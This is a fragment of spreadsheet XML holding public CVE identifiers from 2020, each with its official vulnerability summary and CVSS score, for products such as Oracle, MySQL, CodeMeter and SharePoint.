    <t>GateManager versions prior to 9.2c, The affected product uses a weak hash type, which may allow an attacker to view user passwords.</t>
  </si>
  <si>
    <t>CVE-2020-14513</t>
  </si>
  <si>
    <t>CodeMeter (All versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields.</t>
  </si>
  <si>
    <t>CVE-2020-14514</t>
  </si>
  <si>
    <t>All trailer Power Line Communications are affected. PLC bus traffic can be sniffed reliably via an active antenna up to 6 feet away. Further distances are also possible, subject to environmental conditions and receiver improvements.</t>
  </si>
  <si>
    <t>CVE-2020-14515</t>
  </si>
  <si>
    <t>CodeMeter (All versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected.</t>
  </si>
  <si>
    <t>CVE-2020-14516</t>
  </si>
  <si>
    <t>In Rockwell Automation FactoryTalk Services Platform Versions 6.10.00 and 6.11.00, there is an issue with the implementation of the SHA-256 hashing algorithm with FactoryTalk Services Platform that prevents the user password from being hashed properly.</t>
  </si>
  <si>
    <t>CVE-2020-14517</t>
  </si>
  <si>
    <t>Protocol encryption can be easily broken for CodeMeter (All versions prior to 6.90 are affected, including Version 6.90 or newer only if CodeMeter Runtime is running as server) and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API.</t>
  </si>
  <si>
    <t>CVE-2020-14518</t>
  </si>
  <si>
    <t>Philips DreamMapper, Version 2.24 and prior. Information written to log files can give guidance to a potential attacker.</t>
  </si>
  <si>
    <t>CVE-2020-14519</t>
  </si>
  <si>
    <t>This vulnerability allows an attacker to use the internal WebSockets API for CodeMeter (All versions prior to 7.00 are affected, including Version 7.0 or newer with the affected WebSockets API still enabled. This is especially relevant for systems or devices where a web browser is used to access a web server) via a specifically crafted Java Script payload, which may allow alteration or creation of license files for when combined with CVE-2020-14515.</t>
  </si>
  <si>
    <t>CVE-2020-1452</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1200, CVE-2020-1210, CVE-2020-1453, CVE-2020-1576, CVE-2020-1595.</t>
  </si>
  <si>
    <t>CVE-2020-14520</t>
  </si>
  <si>
    <t>The affected product is vulnerable to an information leak, which may allow an attacker to obtain sensitive information on the Ignition 8 (all versions prior to 8.0.13).</t>
  </si>
  <si>
    <t>CVE-2020-14521</t>
  </si>
  <si>
    <t>Multiple Mitsubishi Electric Factory Automation engineering software products have a malicious code execution vulnerability. A malicious attacker could use this vulnerability to obtain information, modify information, and cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-14522</t>
  </si>
  <si>
    <t>Softing Industrial Automation all versions prior to the latest build of version 4.47.0, The affected product is vulnerable to uncontrolled resource consumption, which may allow an attacker to cause a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2020-14523</t>
  </si>
  <si>
    <t>Multiple Mitsubishi Electric Factory Automation products have a vulnerability that allows an attacker to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-14524</t>
  </si>
  <si>
    <t>Softing Industrial Automation all versions prior to the latest build of version 4.47.0, The affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-14525</t>
  </si>
  <si>
    <t>Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output used as a webpage that is served to other users.</t>
  </si>
  <si>
    <t>CVE-2020-14527</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Portfolio Management product of Oracle Construction and Engineering (component: Web Access). Supported versions that are affected are 16.1.0.0-16.1.5.1, 18.0.0.0-18.0.2.0 and 19.0.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Portfolio Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera Portfolio Management accessible data as well as unauthorized update, insert or delete access to some of Primavera Portfolio Management accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14528</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Portfolio Management product of Oracle Construction and Engineering (component: Web Access). Supported versions that are affected are 16.1.0.0-16.1.5.1, 18.0.0.0-18.0.2.0 and 19.0.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Portfolio Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Primavera Portfolio Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Primavera Portfolio Management accessible data as well as unauthorized read access to a subset of Primavera Portfolio Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14529</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Portfolio Management product of Oracle Construction and Engineering (component: Investor Module). Supported versions that are affected are 16.1.0.0-16.1.5.1, 18.0.0.0-18.0.2.0 and 19.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Primavera Portfolio Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Primavera Portfolio Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Primavera Portfolio Management accessible data as well as unauthorized read access to a subset of Primavera Portfolio Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1453</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1200, CVE-2020-1210, CVE-2020-1452, CVE-2020-1576, CVE-2020-1595.</t>
  </si>
  <si>
    <t>CVE-2020-14530</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Security Service product of Oracle Fusion Middleware (component: None). The supported version that is affected is 11.1.1.9.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Security Service. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Security Service accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14531</t>
  </si>
  <si>
    <t>Vulnerability in the Siebel UI Framework product of Oracle Siebel CRM (component: SWSE Server). Supported versions that are affected are 20.6 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel UI Framework. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Siebel UI Framework accessible data as well as unauthorized update, insert or delete access to some of Siebel UI Framework accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14532</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Commerce Platform product of Oracle Commerce (component: Dynamo Application Framework). Supported versions that are affected are 11.1, 11.2 and prior to 11.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Commerce Platform. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Commerce Platform, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Commerce Platform accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14533</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Commerce Platform product of Oracle Commerce (component: Dynamo Application Framework). Supported versions that are affected are 11.1, 11.2 and prior to 11.3.1. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Commerce Platform. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Commerce Platform accessible data as well as unauthorized read access to a subset of Oracle Commerce Platform accessible data. CVSS 3.1 Base Score 3.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14534</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Popups). The supported version that is affected is 12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Applications Framework accessible data as well as unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14535</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Commerce Service Center product of Oracle Commerce (component: Commerce Service Center). Supported versions that are affected are 11.1, 11.2 and prior to 11.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Commerce Service Center. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Commerce Service Center accessible data as well as unauthorized access to critical data or complete access to all Oracle Commerce Service Center accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14536</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Commerce Guided Search / Oracle Commerce Experience Manager product of Oracle Commerce (component: Workbench). Supported versions that are affected are 11.0, 11.1, 11.2 and prior to 11.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Commerce Guided Search / Oracle Commerce Experience Manager. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data as well as unauthorized access to critical data or complete access to all Oracle Commerce Guided Search / Oracle Commerce Experience Manager accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14537</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Packaging Scripts). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-14539</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20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0-1454</t>
  </si>
  <si>
    <t>This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka 'Microsoft SharePoint Reflective XSS Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14540</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.30 and prior and 8.0.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541</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Financial Close Management product of Oracle Hyperion (component: Close Manager). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Financial Close Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Financial Close Management accessible data. CVSS 3.1 Base Score 2.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14542</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: libsuri). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14543</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Installation). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Reporting and Analytics. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14544</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: Data, Domain &amp; Function Security). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14545</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Device Driver Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-14546</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Financial Close Management product of Oracle Hyperion (component: Close Manager). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Financial Close Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Financial Close Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14547</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.30 and prior and 8.0.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548</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Difficult to exploit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read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 3.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14549</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Portfolio Management product of Oracle Construction and Engineering (component: Web Server). Supported versions that are affected are 16.1.0.0-16.1.5.1, 18.0.0.0-18.0.2.0 and 19.0.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Primavera Portfolio Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera Portfolio Management accessible data as well as unauthorized update, insert or delete access to some of Primavera Portfolio Management accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1455</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when Microsoft SQL Server Management Studio (SSMS) improperly handles files, aka 'Microsoft SQL Server Management Studio Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14550</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Client product of Oracle MySQL (component: C API). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14551</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle AutoVue product of Oracle Supply Chain (component: Security). The supported version that is affected is 21.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle AutoVue. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle AutoVue accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14552</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebCenter Portal product of Oracle Fusion Middleware (component: Security Framework). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Portal. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Portal, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Portal accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14553</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14554</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.8. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Object Library, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14555</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9.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update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14556</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded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1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14557</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14558</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14559</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Information Schema). Supported versions that are affected are 5.6.48 and prior, 5.7.30 and prior and 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1456</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1450, CVE-2020-1451.</t>
  </si>
  <si>
    <t>CVE-2020-14560</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hyperion BI+ product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hyperion BI+ accessible data. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14561</t>
  </si>
  <si>
    <t>CVE-2020-14562</t>
  </si>
  <si>
    <t>Vulnerability in the Java SE product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Java SE: 11.0.7 and 14.0.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS)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1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14563</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Enterprise Communications Broker product of Oracle Communications Applications (component: WebGUI). Supported versions that are affected are 3.0.0-3.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Communications Broker. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Communications Broker, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Enterprise Communications Broker accessible data as well as unauthorized read access to a subset of Oracle Enterprise Communications Broker accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14564</t>
  </si>
  <si>
    <t>Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Environment Mgmt Console). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14565</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Unified Directory product of Oracle Fusion Middleware (component: Security). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Unified Directory. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Unified Directory, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Unified Directory accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Unified Directory. CVSS 3.1 Base Score 8.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-14566</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera Portfolio Management product of Oracle Construction and Engineering (component: Web Access). Supported versions that are affected are 16.1.0.0-16.1.5.1, 18.0.0.0-18.0.2.0 and 19.0.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Portfolio Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Primavera Portfolio Management accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14567</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.29 and prior and 8.0.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568</t>
  </si>
  <si>
    <t>Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.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569</t>
  </si>
  <si>
